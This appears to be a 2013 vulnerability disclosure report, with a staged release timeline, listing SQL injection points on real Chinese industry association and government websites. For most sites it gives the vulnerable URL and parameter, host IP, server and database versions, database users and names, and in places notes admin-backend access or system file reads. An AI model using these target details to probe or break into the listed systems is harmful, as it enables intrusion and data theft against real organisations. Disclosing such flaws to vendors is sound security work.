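2013-05-28: Details reported to the vendor; awaiting vendor handling
2013-06-01: Vendor confirmed; details disclosed only to the vendor
2013-06-11: Details disclosed to core white hats and experts in related fields
2013-06-21: Details disclosed to regular white hats
2013-07-01: Details disclosed to intern white hats
2013-07-12: Details disclosed to the public
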
【Shanghai Express Industry Association】 Injection point: http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14
Target: http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14
Host IP: 222.73.218.56
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
DB Server: MySQL >=5
Resp. Time(avg): 671 ms
Current User: kdxhdata@localhost
Sql Version: 5.1.63-community
Current DB: kdxhdata
System User: kdxhdata@localhost
Host Name: ewww6-c5d621bc4
Installation dir: D:\Data\MySQL\MySQL Server 5.1
DB User: 'kdxhdata'@'localhost'
Data Bases: information_schema kdxhdata
The admin backend can be accessed; I won't take a screenshot. The test account was never even deleted, which is just embarrassing.

【Zhongshan Logistics Association】 Injection point: http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214
Target: http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214
Host IP: 119.145.255.140
Web Server: nginx/1.2.0
DB Server: MySQL >=4.1
Resp. Time(avg): 97 ms
Current User: [email protected]
Sql Version: 4.1.20-standard-log
Current DB: logistics
System User: [email protected]
DB User & Pass:
[/etc/passwd]
[/etc/group]

【Guangdong Enterprise Credit Information Network】 Injection point: http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:
Target: http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:
Host IP: 210.76.66.106
Web Server: Apache/2.0.49 (Unix)
DB Server: Oracle
Resp. Time(avg): 2590 ms
Current User: CREDIT
Is User DBA: FALSE
Sql Version: Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Prod
Current DB: CRDT
Host Name: localhost
DB User: SCOTT MGMT_VIEW WKPROXY WKSYS MDDATA SYSMAN ANONYMOUS XDB WK_TEST OLAPSYS CTXSYS MDSYS SI_INFORMTN_SCHEMA ORDPLUGINS ORDSYS EXFSYS WMSYS DBSNMP DMSYS DIP OUTLN SYSTEM SYS CREDIT
Data Bases: SYS SYS SYS SYS
I don't know what these data tables are used for, but I think they look pretty significant.

Hubei Logistics Public Information Service Platform, login form injection: http://www.56ok.net/backstage/Login.aspx (admin backend)

【Dongguan Logistics Industry Association official website】 Injection point: http://www.0769wl.com/info/info_browse.php?infoID=6548
Target: http://www.0769wl.com/info/info_browse.php?infoID=6548
Host IP: 222.186.191.104
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Resp. Time(avg): 210 ms
Current User: sql0769wl@suer-ab6d8c667e
Sql Version: 5.0.51b-community-nt
Current DB: sql0769wl
System User: sql0769wl@suer-ab6d8c667e
Host Name: suer-ab6d8c667e
Installation dir: E:\PHPnow\MySQL-5.0.15b
DB User: 'sql0769wl'@'%'
Data Bases: information_schema sql0769wl
I don't know which one is the admin backend table, so I'll leave it here.

【Nantong Banking Association】 Injection point: http://www.bankingassociationnt.com/news/Transfer.asp?newsid=8084
Usernames can be read out; I'll leave the specifics for the emergency response center to test.

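【Hainan Province Certified Public Accountants Association】 Injection point: http://www.hicpa.org.cn/acctt_web/papers/zhxx.asp?cs=101

Severity: High
Vulnerability Rank: 20
Confirmation time: 2013-06-01 22:13
None yet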